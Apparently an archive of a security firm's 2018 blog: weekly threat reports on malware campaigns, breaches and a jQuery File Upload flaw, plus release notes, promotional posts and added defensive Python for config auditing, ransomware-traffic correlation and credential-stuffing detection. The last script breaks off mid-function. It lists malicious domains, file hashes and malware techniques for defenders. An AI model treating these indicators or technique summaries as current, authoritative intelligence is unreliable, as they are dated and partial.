Cashdollar reported the vulnerability to Sebastian Tschan (aka Blueimp), the German developer who authored the jQuery File Upload plugin. Tschan conducted his own research and found that the root cause lies in a security change in the Apache HTTP Server dating back to 2010 (version 2.3.9), which stopped honouring “.htaccess” files by default so that a server owner’s configuration can no longer be overridden for individual directories. The plugin unknowingly relied on a “.htaccess” file to restrict what could be done with uploaded files, and that file had been honoured by default before the change. All versions of the plugin prior to 9.22.1 are vulnerable.

The plugin has been integrated into thousands of projects, such as content management systems (CMS), customer relationship management (CRM) tools, intranet solutions, WordPress plugins, Drupal add-ons, and Joomla components, to name a few. The jQuery File Upload plugin has been forked on GitHub over 7,800 times. Cashdollar used his proof of concept (PoC) to test 1,000 of the 7,800 forks and found that all were exploitable. But GitHub forks of this vulnerable code are only one part of the problem: there is no way to track applications that have integrated the plugin without forking it on GitHub. Cashdollar has notified US-CERT due to the seriousness of the vulnerability.

This is a critical vulnerability and can allow an attacker to remotely gain control of vulnerable applications. It is amazing that this hasn’t been discovered more recently since it has been on YouTube for three years. It’s time to start writing YouTube scrapers into our open source intel tools. If you are using a jQuery File Upload plugin or a forked version of this vulnerable code in your application, you should upgrade immediately. If you’re including unknown open source code into your application, you should attempt a security review of the code.
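The lesson of this bug is broader than one plugin: any restriction that lives in a .htaccess file silently stops applying the moment the enclosing <Directory> section says AllowOverride None, which has been Apache’s default since 2.3.9. Here is an added Python check (example code for this post, not from Akamai or from the plugin) that parses the <Directory> sections of an httpd.conf, works out the effective AllowOverride for each directory that carries a .htaccess, and reports the ones Apache will never read. The configuration fragment and the directory paths are constructed for the example.

```python
import re

# Constructed httpd.conf fragment for the example (not from the page).
SAMPLE_CONF = """
<Directory />
    AllowOverride None
    Require all denied
</Directory>

<Directory "/var/www/html">
    AllowOverride None
    Require all granted
</Directory>

<Directory "/var/www/legacy">
    AllowOverride All
</Directory>
"""

# Directories that carry a .htaccess meant to restrict uploaded files, e.g. an
# upload plugin's files directory. Paths are assumptions for the example.
HTACCESS_DIRS = ["/var/www/html/server/php/files", "/var/www/legacy/uploads"]


def parse_directory_overrides(conf_text):
    """Map each <Directory> path to its AllowOverride value.
    A section with no AllowOverride gets None, the Apache 2.3.9+ default."""
    overrides = {}
    current = None
    for raw in conf_text.splitlines():
        line = raw.strip()
        m = re.match(r'<Directory\s+"?([^">]+?)"?\s*>$', line, re.I)
        if m:
            current = m.group(1).rstrip("/") or "/"
            overrides.setdefault(current, "None")
            continue
        if line.lower() == "</directory>":
            current = None
            continue
        m = re.match(r"AllowOverride\s+(.+)$", line, re.I)
        if m and current is not None:
            overrides[current] = m.group(1).strip()
    return overrides


def effective_override(path, overrides):
    """The most specific matching <Directory> section wins, as in Apache's merge order.
    Paths covered by no section fall back to the None default."""
    best, value = None, "None"
    for d, v in overrides.items():
        prefix = d if d == "/" else d + "/"
        if (path == d or path.startswith(prefix)) and (best is None or len(d) > len(best)):
            best, value = d, v
    return value


def htaccess_ignored(htaccess_dirs, overrides):
    """Directories whose .htaccess Apache will not read (effective AllowOverride None)."""
    return sorted(d for d in htaccess_dirs if effective_override(d, overrides).lower() == "none")
```

If a directory shows up in that list, its protections have to move into the main server configuration (a <Directory> block with the same directives), because turning AllowOverride back on server-wide just reopens the performance and security problems the Apache default was meant to close. The parser does not follow Include directives or <Location> sections, so run it over the fully assembled configuration.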

75,000 Individuals’ Records Compromised from

AP News reports that roughly 75,000 individuals’ records have been compromised in a security breach. On October 19, 2018, the Centers for Medicare and Medicaid Services (CMS) released an official statement explaining that on October 13 they detected suspicious activity in the Federally Facilitated Exchange’s (FFE’s) Direct Enrollment Pathway, a system designed to allow agents and brokers to help customers apply for coverage in the FFE. An official data breach was declared on October 16. CMS states that agent and broker accounts associated with the suspicious activity were deactivated and the Direct Enrollment Pathway for agents and brokers was also disabled.

Officials determined that roughly 75,000 individuals’ records were accessed during the breach but note that this is a “small fraction” of the FFE’s total consumer records. CMS officials are currently working to identify all individuals impacted by the breach so that they may be notified and offered credit protection. CMS officials also state that open enrollment on HealthCare[.]gov and the Marketplace Call Center are presently available for the general public. A more secure Direct Enrollment Pathway system will be restored for agents and brokers within the next seven days. The statement adds that CMS is in the beginning stages of the assessment of the breach.

Since only some agent and broker accounts were associated with the suspicious activity, this was likely the result of weak passwords being brute-forced or password-stealing malware on those users’ machines.

Release the Kraken: New Variant on Kraken Cryptor Ransomware

Bleeping Computer has recently published a report about a new variant of Kraken Cryptor ransomware being distributed via malvertising and through the RIG exploit kit. The new Kraken Cryptor version 2.0.6 was first detected by security researchers @nao_sec and @kafeine and shared with Bleeping Computer.

Through the shared file hashes and information, Bleeping Computer was able to determine that this ransomware had infected 217 unique victims globally since October 20, 2018. Interestingly, this new variant connects to bleepingcomputer[.]com during different stages of the encryption process. It is still not certain what the motive is for connecting to BleepingComputer during encryption. BleepingComputer owner Lawrence Abrams says it is just to poke at them, since BleepingComputer has covered Kraken Cryptor ransomware in the past.

The request to the URL shortening service is encrypted, so you likely won’t be able to see the user-agent or referrer unless you use a forward proxy to inspect outbound traffic. However, you should see an encrypted connection to the 2no[.]co domain followed by a redirect to bleepingcomputer[.]com.


  • 2no[.]co (legit url shortening service)
  • bleepingcomputer[.]com (legit site haunted by a vengeful ghost)

HTTP User-agent:

  • Kraken web request agent/v2.0.6

HTTP Referrer:

  • country code + drive size + status

We know that Ransomware can be scary, so we asked Perchy to look around for this new variant. Perchy says, no traffic in the last 30 days is consistent with indicators for the newly released variant of Kraken Cryptor. All Perch customers are clear, and no infection was seen.
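Since the user-agent and referrer are hidden inside TLS for most of us, the hunt has to work from what is visible without decryption: which host talked to the shortener and then to BleepingComputer, and how close together. The Python below is an added example (not Perch’s detection logic) that correlates TLS SNI or DNS records per source host and reports the shortener-then-target sequence inside a five-minute window, with a separate user-agent check for sites that do run a decrypting proxy. The window and the sample events are constructed for the example.

```python
from datetime import datetime, timedelta

SHORTENER_DOMAIN = "2no.co"
TARGET_DOMAIN = "bleepingcomputer.com"
WINDOW = timedelta(minutes=5)  # assumption for the example
UA_PREFIX = "Kraken web request agent/"


def _under(host, domain):
    host = host.lower().rstrip(".")
    return host == domain or host.endswith("." + domain)


def correlate(events, window=WINDOW):
    """events: iterable of (ISO timestamp, src_ip, server name from TLS SNI or DNS).
    Returns sorted (src_ip, shortener time, target time) tuples for hosts that
    reached the shortener and then the target inside the window."""
    by_host = {}
    for ts, ip, name in events:
        by_host.setdefault(ip, []).append((datetime.fromisoformat(ts), name))
    hits = []
    for ip, evs in by_host.items():
        evs.sort(key=lambda e: e[0])
        for i, (t1, n1) in enumerate(evs):
            if not _under(n1, SHORTENER_DOMAIN):
                continue
            for t2, n2 in evs[i + 1:]:
                if t2 - t1 > window:
                    break  # events are sorted, nothing later can qualify
                if _under(n2, TARGET_DOMAIN):
                    hits.append((ip, t1.isoformat(), t2.isoformat()))
                    break
    return sorted(hits)


def ua_matches(user_agent):
    """Only usable where a forward proxy decrypts outbound HTTPS."""
    return user_agent.startswith(UA_PREFIX)


# Constructed sample events (not real traffic): one infected host, one reader,
# one host whose two connections are too far apart to be the same sequence.
SAMPLE_EVENTS = [
    ("2018-10-25T10:00:05", "10.2.0.5", "2no.co"),
    ("2018-10-25T10:00:09", "10.2.0.5", "www.bleepingcomputer.com"),
    ("2018-10-25T11:15:00", "10.2.0.6", "www.bleepingcomputer.com"),
    ("2018-10-25T12:00:00", "10.2.0.7", "2no.co"),
    ("2018-10-25T12:30:00", "10.2.0.7", "www.bleepingcomputer.com"),
]
```

Treat a hit as a lead, not a verdict: someone clicking a 2no.co short link that happens to point at a BleepingComputer article produces the same sequence. Prefer TLS SNI or flow logs over DNS for the timestamps, since a cached DNS answer can suppress the second lookup entirely.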

Release Notes

October 19, 2018

  • Dashboard: List all the SLAs available to an organization
  • Indicators: STIX2 models for Django and PostgreSQL
  • Perchybana: Query dns/flow indices with company ID in name
  • Sensor: Put sensor files behind a Perch subdomain
  • Settings: Create a new organization for MSSP users
  • Settings: List all the MSSPs an organization is managed by

  • Communities: Fix issue with community feeds
  • Docker: Fix issues with
  • Email: Serialize request as JSON
  • Email: Use string format vs SMTP format
  • Perchybana: Fix QA perchybana
  • Sensor: Change permission to TeamMembers

  • Sensor files are behind a Perch subdomain
  • Some ES dns/flow indices now have Company ID in the name
  • MSSPs can create and link new organizations from settings
  • Life support for ElasticSearch through assumed AWS turbulence

Threat Report Thursday October 17th 2018

on October 17, 2018

Welcome back to the Perch weekly threat report. Over the last week there has been a lot of security related news, but we’re focusing on a ransomware outbreak reported by a state-run utility and spotlighting one of Zeus’ lesser-known offspring, Panda Banker.

Ransomware Demands Flushed by North Carolina Sewer Authority

Disaster recovery plans are essential when attempting to recover from a ransomware attack, as shown recently by Onslow Water and Sewer Authority. That may include ready-to-restore backups or having manual processes in place for different disaster scenarios. If ransomware isn’t a scenario you plan for, you should.

According to an official statement released Monday, October 15, 2018, Jacksonville, North Carolina-based Onslow Water and Sewer Authority (ONWASA) suffered an attack that resulted in malware infection. The company states that on October 4th, they began experiencing persistent virus attacks from Emotet malware. On Saturday, October 13, at 3AM local time, the company states that Emotet dropped Ryuk ransomware, which spread along the network, rapidly infecting databases and files. ONWASA refused to pay the ransom and instead chose to “undertake the painstaking process of rebuilding its databases and computer systems from the ground up.” The attack did not expose customer information, nor did it interrupt water and wastewater services to homes and businesses.

The statement notes that the incident is similar to another ransomware attack on official county computer systems in Mecklenburg County, North Carolina, which occurred last year. An FBI spokesperson confirmed that they are currently investigating the incident.

The faster a threat is detected, the less it costs to remediate. That’s why having threat detection and a SOC in place is key. Had this attack been caught and stopped at the initial Emotet infection, it would have cost less than responding to a ransomware outbreak.

Malware Spotlight: Panda Banker

I heard sunlight is the best disinfectant. So this week we decided to shine some light on the well-maintained Panda Banker malware, a variant of the Zeus banking trojan.

Researchers have identified that Panda Banker has been updated numerous times and has remained active since 2016. Recently, Panda Banker has been installed by the Emotet malware. The attack takes the form of a malspam phishing campaign that uses weaponized Microsoft documents to deploy the payload. Researchers note that financial institutions and a video streaming service/e-commerce company were targeted in Japan. Other primary targets were organizations from the United States and Canada.

Researchers note that the malware has a sophisticated attack cycle, combined with heavy code obfuscation and multiple layers of encryption. After execution, it first checks whether it is running in a sandbox, then creates a copy of itself. The malware then spawns two “svchost.exe” processes and injects the Trojan into them. It downloads its configuration from its C&C server and injects a DLL that intercepts browser traffic through API hooking.

Panda Banker uses the Mersenne Twister algorithm to generate the URL it connects to for its C&C server. Panda Banker will lie in wait until the infected browser visits a targeted website, such as an online banking system, a credit card company, or a blockchain information site. The malware will then steal bank or credit card details, personal data, and web wallet information. This campaign shows that financial gain is a major factor in how Trojans are being used by threat actors.

The Perch SOC regularly goes thrunting, a term they lovingly created for threat hunting, for observables in all customer environments. If you’re a customer, good news! We’ve checked your security event data for over 200 indicators related to Panda Banker. We found no signs of Panda Banker being downloaded or smuggling bits out of your environment. At Perch, we enable customers to see further because we give a flock. Below is a list of domains Perch found linked from malspam.


  • apx[.]email
  • carolinegraham[.]me
  • carvanadenver[.]com
  • carvanamemphis[.]com
  • carvananashville[.]com
  • colleenmansfield[.]com
  • genesisatoxmoor[.]com
  • genesiseastlouisville[.]com
  • genesisofeaslouisville[.]com
  • genesisofindiana[.]com
  • genesisofwestlouisville[.]com
  • jclgraham[.]com
  • laurengraham[.]me
  • michaelagraham[.]com
  • newlacafe[.]com
  • oxmoorusedcars[.]com
  • pegasussoilsolutions[.]com
  • pegasussoilsolutionsllc[.]com
  • sellittooxmoor[.]com
  • selltooxmoor[.]com
  • zombiedebtslayer[.]com

How Customer Feedback Becomes Features

on October 16, 2018

Our customers have a strong voice. Remember Perch’s first customer was not too long ago. Starting with that very first one we have always catered to the needs of our customers. Since the beginning, our goal has been customer experience and satisfaction. This extends past the users of our products and into the customer’s overall experience with Perch. It’s not just our stakeholders guiding our roadmap and pushing new features, but our customers as well.

We offer our customers (more specifically at this point we are referring to users) many ways to communicate their feedback with us. Feedback can be as simple as a Slack message, email, all the way to offering feedback during our monthly (-ish) users call where we invite all of our users to join. As a startup, we have a unique opportunity to cater to our customers more than say a large enterprise that would probably automatically turn your feedback into a ticket in some backlog somewhere. We will have conversations and even meetings to listen to your feedback.

Perch methods of communication

This applies to all users, not just our external customers, but our internal users as well. Currently, the heaviest users of the app are the users of our own Security Operations Center (SOC). We have done a lot to improve their workflow, which in turn improves the app for all users.

What do we do with that feedback?

We make a ticket and shove it deep into our backlog. Kidding (that’s the other guys 😉). Like I was saying, we take the time to understand your wants and needs. Sometimes it’s simple and sometimes it requires larger discussions. We then take that feedback and turn it into acceptance criteria in our ticketing system. These tickets are all hand written by a member of our team.

Here at Perch we encourage tickets and even have fun little automated messages to remind our team members that tickets 👏🏻 are 👏🏻 encouraged 👏🏻.

Make 👏 a 👏 ticket 👏

Our custom Slackbot response

After the ticket is written, we place it into our backlog. All tickets are looked at agnostically, whether they came from a large stakeholder or our smallest customer. Your feedback, turned ticket, may actually go to the bottom of the list after all; but it may also go right up to the top, especially if many users share similar feedback about a particular item.

Okay it’s a ticket, now what?

Not all tickets are features. Bugs or things that don’t work quite right are also ticket-ized, as well as a handful of other tasks. This feedback is just as important. For the sake of this article, let’s assume the customer is requesting a new feature.

Depending on what the feature is, it may land in the lap of the design team (aka the best team aka my team 👨🏻‍🎨🌈) to interpret the feature visually before development begins. Sometimes it’s just a mockup, but it can also include user flows, mind maps, and animated prototypes. The designers work closely with the developers as a singular product team, constantly commingling (because we don’t like silos ☹️). This ensures the customer’s feedback is correctly translated at all stages.

We will often share these mockups during the users call I mentioned earlier. We may even reach back to the customer who originally gave us the feedback for their thoughts on the design. We want as much input as possible before development even begins to streamline the process.

Once it’s ready to develop our engineers (which is what coders like to be called these days 😉) will turn it into reality with their magic-like skills.

A programmer at work

Launching new features

Once it’s ready to go we push it to our QA environment where we do a bit of testing. From here we push it to production where we get it into the hands of our users. We will even release beta features to production because we want it in our users’ hands to give us more feedback and help improve the feature.

We admit we are not perfect and don’t always nail it 100% of the time. That’s not realistic, especially for a fast-moving startup. We release features knowing that even if we think it’s perfect - there is always room for improvement. Another reason why we happily invite feedback.

Real world examples

One feature from the app that comes to mind is the Since You’ve Been Gone feature released not too long ago.

Since You've Been Gone Feature

A few users - particularly ones that did not log in often - wanted to see what has happened since they were gone. If you don’t already know, our SOC works around the clock fighting off threaty threats for you. So even if you don’t take any action within the app, a lot might have happened while you were gone.

We went through the whole process mentioned above to get this feature into our app - all starting with customer feedback!

Feedback to feature lifecycle

All of this to say

All of us at Perch want our customers to be happy. Tell us what you want to see in our app and we’ll build it for you (probably 😝). It’s a simple idea, certainly not a novel one, but one that not many companies can actually achieve. At least not with our level of love and care ❤️.

Threat Report Thursday October 11th 2018

on October 11, 2018

This week we’re covering three current events. The first two are related to threats targeting the financial sector. The last is a cautionary tale of malware infection at a large restaurant chain.

APT38 is getting SWIFT

In a report published October 3, 2018, FireEye detailed the activities of APT38, a threat actor conducting financially motivated and cyber-espionage related crimes on behalf of the North Korean regime. FireEye identifies APT38 as a North Korean Nation State sponsored group sharing overlapping characteristics with both Lazarus Group and TEMP.Hermit. According to their findings, APT38 executes sophisticated bank heists resulting from extensive planning and maintains long periods of access on a compromised victim’s environment. APT38 was linked to multiple incidents targeting SWIFT systems. APT38’s primary goal is to raise large sums of money for the North Korean regime; however, FireEye states that they also target infrastructure to facilitate continuous operations and evade detection.

APT38 primarily targets financial institutions such as banks, credit unions, and financial transaction and exchange companies. Other targeted organizations include media companies and government entities. Known victims reside in the following countries: the United States, Mexico, Brazil, Chile, Uruguay, Poland, Turkey, Russia, Bangladesh, Malaysia, Vietnam, and the Philippines. In Annex B of the report, FireEye details an extensive list of malware used by APT38, ranging from established, well-known tools (NestEgg, DarkComet) to lesser-known tools (DyePack, BLINDTOAD). FireEye believes APT38 is a well-resourced and persistent threat likely to continue its illicit financial-crime activities.

Betabot continues to evolve its toolset for breaking the bank

Security researchers from Cybereason have detected a new campaign involving the Betabot (Neurevt) Trojan. Betabot first appeared in 2012 as an info-stealer and evolved into a banking trojan packed with destructive features. This updated version includes browser form grabbing, a File Transfer Protocol (FTP) and mail client stealer, a banker module, distributed denial of service (DDoS) attacks, a USB infection module, a robust userland rootkit (x86/x64), arbitrary command execution via shell, and a crypto-currency miner module. Betabot can also drop other malware and gain persistence via Windows Task Scheduler and Registry Autorun. Researchers note that Betabot was designed to operate in “paranoid mode.” It includes self-defense mechanisms such as anti-debugging, anti-virtual machine/sandbox, and anti-disassembly, and it detects at least 30 security products and analysis tools and attempts to disable or remove them.

The malware is delivered through a phishing attack with social engineering tactics. The email persuades the user to open an attached weaponized Microsoft Word document; Betabot exploits CVE-2017-11882, an 18-year-old vulnerability in the Equation Editor tool in Microsoft Office. The vulnerability was discovered in 2017 and patched by Microsoft. The malware communicates with its C&C server after checking for internet connectivity by sending requests to and Microsoft Update sites. Researchers note that to prevent Betabot infections, users should keep their software up to date, install Microsoft security patches, and avoid opening attachments from unknown senders.

Malware gets year-long all you can eat burger time pass

Restaurant chain Burgerville has recently revealed a security breach that started over a year ago. Based on the online report, the Federal Bureau of Investigation (FBI) contacted Burgerville in August 2018 about a security incident involving FIN7, which was thought to be a “brief intrusion” that no longer existed. By September 19, the FBI informed Burgerville that the attack was still active and much more severe than expected. Burgerville took steps toward remediation and, in cooperation with the FBI and an outside cybersecurity firm, launched a full forensic investigation. Based on the investigation, malware was installed on Burgerville systems such as Point of Sale (PoS) machines to steal customer data. Customers’ credit and debit card information, such as names, card numbers, expiration dates, and CVV numbers, may have been compromised. The number of affected customers is currently unknown, as the tactics of FIN7 were said to be sophisticated and adept at concealing their digital footprints.

Burgerville explained that they didn’t announce the breach sooner in order to maintain the confidentiality of the investigation with the FBI. The remediation plan, which was completed by September 30, had to be kept secret. As part of that plan, Burgerville has also upgraded its systems to counter this kind of attack. The company has asked customers who visited its restaurants and used their cards between September 2017 and September 2018 to monitor their financial statements for fraudulent activity.

The longer a threat goes undetected, the more expensive it is to remediate. Security programs can be expensive if you go it alone. If Burgerville had had a team of security analysts monitoring, rather than relying on FBI notification, they would have caught the initial and continued infection.



What Managed Service Providers Need When it Comes to Security

on October 9, 2018

Having spent 20+ years helping transform IT and security in enterprise organizations and small businesses alike, I have seen it all. But helping the organizations that don’t have their own IT staff or security program is crucially important to the success of the vast majority of all businesses in the nation. This is where our strategic partnerships with Managed Service Providers really shine.

Managed Service Providers, also known as MSPs, are the IT and security department for those organizations that aren’t large enough to have their own IT staff. The SBE Council estimates that 98.2% of businesses have fewer than 100 employees, the exact target market for many MSPs. But what does this mean for the owner of an MSP that is likely part of the above demographic?

Antivirus, Firewalls, Compliance, Phishing, Malware, Hacking, Breaches, User Awareness Training; these are some of the things a Managed Service Provider thinks of when they think about securing their customers. The task of ensuring your customer and clients are secure is a daunting task for many organizations, and one area is often overlooked: visibility and actionable outcomes.

Perch provides visibility with real-world threat intelligence in an intuitive and easy-to-use interface. Real-time visibility is critical to the success of any security program, especially when implemented in a way that doesn’t force you to restructure your existing IT and information security processes, rip and replace toolsets, spend countless hours training staff, or add headcount. Compared with the typical SOC-as-a-Service (SOCaaS) solution, we prefer to integrate into the toolsets that you are most comfortable with. With Perch you will be up and running in a few minutes (no joke!) as opposed to weeks with other solutions. Perch was designed from the ground up by practitioners with real-world IT and information security experience in organizations both large and small.

Some of the world-class functionality that Perch offers:
- We deliver world class threat detection capabilities you’d expect from an IDS.
- Visibility into network traffic that you can only get from large network monitoring vendors.
- SOC services that scale with your needs – if you have your own SOC – awesome, if you don’t, use ours!
- Easy implementation you’d expect from a well-designed product.
- Perch was designed for multi-tenancy out of the box, so the management flow of multiple companies is intuitive and seamless.

As you can see, an MSP has a lot to consider in the realm of IT and information security. MSPs add Perch to their security stack because it provides consistent visibility into their customer and client networks in an easy and repeatable fashion. If you’re interested in a demo of Perch, head over to our page.

Release Notes

October 5, 2018

  • Email: Added SLA info to emails and migrated to new email-service

  • DB: Fixed database migration conflicts
  • Email: Fix for weekly email summary not sending
  • Sensor: Fix sensor health page and add MSSP permissions

Perch Security Secures $9 Million Series A Funding Led by ConnectWise, Inc.

on October 4, 2018

Perch Security announced today $9 million in Series A funding, through a combined investment from ConnectWise and existing investor Fishtech Group. The funding will fuel Perch’s expansion in software development, marketing and customer success. ConnectWise Founder and CEO Arnie Bellini will join Perch’s Board of Directors.

Check out the full article here.

Threat Report Wednesday October 3rd 2018

on October 3, 2018

In this weekly threat report, we’ll cover three current events. Facebook loses 50 million auth tokens, a phishing campaign is evading AV to deploy remote access trojans, and a ten-year-old privilege escalation vulnerability has major Linux distributions scrambling to release fixes.

Facebook loses control of auth tokens used for FB and every site you log into using Facebook SSO.

On Friday, September 29, Facebook announced that an attacker exploited a vulnerability and potentially compromised up to 50 million users’ Facebook accounts. The vulnerability exposed user access tokens in the HTML of the site page. Facebook published a statement on this incident, which it later updated with further technical details describing the nature of the vulnerability as the combination of three previously unknown flaws in a feature known as ‘View As.’

The statement included the following:

“Earlier this week, we discovered that an external actor attacked our systems and exploited a vulnerability that exposed Facebook access tokens for people’s accounts in HTML when we rendered a particular component of the ‘View As’ feature. The vulnerability was the result of the interaction of three distinct bugs:

First: View As is a privacy feature that lets people see what their profile looks like to someone else. View As should be a view-only interface. However, for one type of composer (the box that lets you post content to Facebook) — specifically the version that enables people to wish their friends happy birthday — View As incorrectly provided the opportunity to post a video.

Second: A new version of our video uploader, introduced in July 2017, incorrectly generated an access token that had the permissions of the Facebook mobile app.

Third: When the video uploader appeared as part of View As, it generated the access token not for you as the viewer, but for the user that you were looking up.”

Fifty million users were potentially affected by this vulnerability. As a precaution, Facebook has reset the tokens. However, that does nothing about data an attacker may already have stolen with them.

Facebook confirmed that these access tokens might have been used to log in to third-party sites via Facebook’s SSO. According to a 2015 report by Gigya, Facebook had the largest share of all identity providers, at 64% of social logins. This aspect of the breach makes it particularly nasty and should remind everyone of the risk of centralized authentication and single sign-on.

Phishing expedition dodges AV to land Adwind RAT

Security researchers from Cisco Talos, together with ReversingLabs, have released a report on a new campaign dropping the Adwind Trojan. This new phishing spam campaign spreads the Adwind 3.0 RAT, which infects Windows, Mac OS X, and Linux operating systems. The spam emails carry weaponized “.csv” and “.xlt” attachments that entice the user to open them.

Adwind 3.0 has a set of new tools, notably an evasion technique that uses the Dynamic Data Exchange (DDE) code-injection technique. DDE, which transfers data between applications, is abused here to compromise Microsoft Excel. Microsoft Excel opens both dropper file types found in this campaign, “.csv” and “.xlt,” by default. Researchers note that this is part of an obfuscation technique that signature-based antivirus is unable to detect: instead of identifying the file as malicious, it reports the file as corrupted. If the user opens the file, the dropper executes. It creates a Visual Basic script that uses the bitsadmin tool to load the final Java archive payload containing the Adwind installer.

This kind of injection has been used for years, but the threat actor was able to customize it to achieve an extremely low detection ratio. Other functions of this RAT include logging keystrokes, taking screenshots, taking pictures, transferring files, and executing any other command from its C&C server. Researchers have verified that the malware has been targeting mostly Turkey and Germany, but many malware samples have also been detected in the US, India, Vietnam, and Hong Kong. Researchers have noted that sandboxing and behavior-based detection should be able to detect and stop this spam campaign.


Reversing Labs

Talos Intelligence


  • 93a482e554e2a37e6893fdd8cd92537c0ebc7363ac5fac44b7a4af4a2088ea24
  • 0af2c5a46df16b98b9ab5af0ec455e98f6e1928c10ed8b6ffec69573498bdd8a
  • 93280872f685f9c26d5f668ca1303f224a38d2b86ba707cdbb3d57427396e752
  • 0a2f74a7787ae904e5a22a3c2b3acf0316c10b95fae08cced7ca5e2fcc7d9bf8
  • 65220dae459432deb1b038dbcbf8a379519a1a797b7b72f6408f94733bc5a2c2


Mutagen Astronomy (CVE-2018-14634) creates a deep impact on Red Hat, CentOS, and Debian

Risk managers had better get that VRM and start checking on vendor patch levels. Security researchers from Qualys have discovered a vulnerability named Mutagen Astronomy (CVE-2018-14634) that affects Red Hat Enterprise Linux (RHEL), CentOS, and Debian users. The critical vulnerability can be used for Local Privilege Escalation (LPE) on 64-bit systems. An integer overflow in the create_elf_tables() Linux kernel function triggers the vulnerability. If exploited, it causes a buffer overflow that executes malicious code with root privileges. According to the researchers, Mutagen Astronomy was present in the Linux kernel between July 19, 2007 (kernel commit: b6a2fea39318) and July 7, 2017 (kernel commit: da029c11e6b1). The researchers published two proofs of concept (PoCs) for Mutagen Astronomy. The Red Hat team has confirmed this vulnerability. Some releases have been patched while some are still vulnerable. If a fix has not been released for your version, a patch is available.

Threat Report Thursday September 28th 2018

on September 28, 2018

This week we are covering three emerging stories in the weekly threat report. First, we’ll cover a newly discovered case of ATM skimmers being installed at banks. Then we’ll transition to two digital threats. The first is related to the reuse of breached credentials in brute force attacks against the financial sector and the second is related to Microsoft’s battle against phishing attacks targeting the upcoming mid-term elections.

Two ATM Skimmers Found at Old Second Bank

Authorities from the Aurora Police Department are investigating ATM skimmers found at two Old Second Bank branches in Aurora. The first ATM skimmer was found on the 1300 block of North Farnsworth Avenue by an Old Second Bank employee at around 6:30 AM. The employee saw a woman walk up to the ATM and act suspiciously. When the woman left the area, the bank employee checked the ATM, found the skimmer, and notified other branches of possible skimming, which in turn identified the second ATM skimmer at the Fox Valley branch. Investigators are looking through security footage and have already released surveillance photos related to the ATM skimming incident. The police are advising bank account holders to immediately report any possible identity or card theft to their bank.


Chicago Suntimes

Credential Stuffing Attacks Focused on Financial Sector

Cybersecurity firm Akamai has recently released its “2018 State of the Internet / Security – Credential Stuffing Attacks Report”. The report shows that organizations, particularly in the financial sector, should be cautious about credential stuffing attacks. Credential stuffing refers to login attempts that reuse credentials recovered from a breach. The trend of malicious login attempts is on the rise because botnets are being used to automate credential stuffing, and according to the researchers, the volume has a Distributed Denial of Service (DDoS) effect. Researchers documented over 30 billion malicious login attempts from November 2017 to June 2018.

Akamai recorded two particular cases of credential stuffing driven by heavy-handed botnet operations. The first is an unnamed Fortune 500 company where login attempts rose from an average of 50,000 an hour to over 350,000 in a single afternoon; that botnet generated 8.5 million malicious attempts in six days. The second is a US credit union that receives 45,000 login attempts every 60 minutes; another botnet using a brute-force attack generated 4.2 million attempts in 7 days. Researchers have noted that the US, Russia, and Vietnam are the primary sources of credential stuffing attacks.

Researchers have mentioned that credential stuffing attacks are continuously evolving their methodologies, from noisier volume-based attacks to stealthy low-and-slow attacks. Without the right defenses and expertise, organizations of every size can fall victim to such attacks.
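
The two attack shapes Akamai describes, the noisy high-volume burst and the stealthy low-and-slow spray, call for different detection rules. As an added example that is not part of the original report or of any Perch tooling, the Python below parses a constructed authentication log (timestamp, source IP, username, outcome) and flags a source either when its failed logins in a sliding one-minute window exceed a burst threshold, or when it fails against many distinct usernames at a low rate. The thresholds, field layout and log lines are assumptions chosen for the demo, not values from the report. It also reports any successful login from a flagged source, since that is the credential the defender most needs to reset.

```python
"""Flag credential-stuffing patterns in an authentication log.

Added example, not from Akamai's report or from Perch. The log format,
thresholds and log lines are constructed for the demo.
"""
from collections import defaultdict
from datetime import datetime, timedelta
from typing import Dict, List

# Demo thresholds (assumptions; real deployments tune these per application).
VOLUME_WINDOW = timedelta(seconds=60)  # sliding window for the burst rule
VOLUME_MAX_FAILS = 5                   # more failures than this in a window = burst
SLOW_MIN_DISTINCT_USERS = 4            # a password spray touches many accounts
SLOW_MIN_FAIL_RATIO = 0.75             # and almost every attempt fails

# Constructed auth log: timestamp, source IP, username, outcome (OK/FAIL).
SAMPLE_AUTH_LOG = """\
2018-09-20T08:00:00Z 10.1.1.5 alice FAIL
2018-09-20T08:00:05Z 10.1.1.5 bob FAIL
2018-09-20T08:00:09Z 10.1.1.5 carol FAIL
2018-09-20T08:00:14Z 10.1.1.5 dave FAIL
2018-09-20T08:00:20Z 10.1.1.5 erin FAIL
2018-09-20T08:00:27Z 10.1.1.5 frank FAIL
2018-09-20T08:03:10Z 10.1.1.7 grace FAIL
2018-09-20T08:03:31Z 10.1.1.7 grace OK
2018-09-20T08:10:00Z 203.0.113.9 alice FAIL
2018-09-20T08:52:00Z 203.0.113.9 bob FAIL
2018-09-20T09:41:00Z 203.0.113.9 carol FAIL
2018-09-20T10:27:00Z 203.0.113.9 dave FAIL
2018-09-20T11:05:00Z 203.0.113.9 erin OK
2018-09-20T12:00:00Z 198.51.100.4 heidi FAIL
2018-09-20T12:30:00Z 198.51.100.4 heidi FAIL
"""


def parse_auth_log(log_text: str) -> List[Dict]:
    """Parse lines into events; malformed lines are skipped, not fatal."""
    events = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue
        ts, src, user, result = parts
        events.append({
            "ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
            "src": src, "user": user, "result": result.upper(),
        })
    return events


def max_failures_in_window(times: List[datetime], window: timedelta) -> int:
    """Largest number of timestamps that fall inside any span of `window`."""
    times = sorted(times)
    best = start = 0
    for end in range(len(times)):
        while times[end] - times[start] > window:
            start += 1
        best = max(best, end - start + 1)
    return best


def detect_credential_stuffing(log_text: str) -> Dict[str, Dict]:
    """Return findings keyed by source IP for sources matching either rule."""
    by_src: Dict[str, List[Dict]] = defaultdict(list)
    for ev in parse_auth_log(log_text):
        by_src[ev["src"]].append(ev)

    findings: Dict[str, Dict] = {}
    for src, evs in by_src.items():
        fails = [e for e in evs if e["result"] == "FAIL"]
        distinct_users = {e["user"] for e in evs}
        burst = max_failures_in_window([e["ts"] for e in fails], VOLUME_WINDOW)
        fail_ratio = len(fails) / len(evs)
        if burst > VOLUME_MAX_FAILS:
            pattern = "volume"
        elif (len(distinct_users) >= SLOW_MIN_DISTINCT_USERS
              and fail_ratio >= SLOW_MIN_FAIL_RATIO):
            pattern = "low_and_slow"
        else:
            continue  # single-user typos and legitimate retries fall through
        findings[src] = {
            "pattern": pattern,
            "attempts": len(evs),
            "distinct_users": len(distinct_users),
            "max_failures_per_window": burst,
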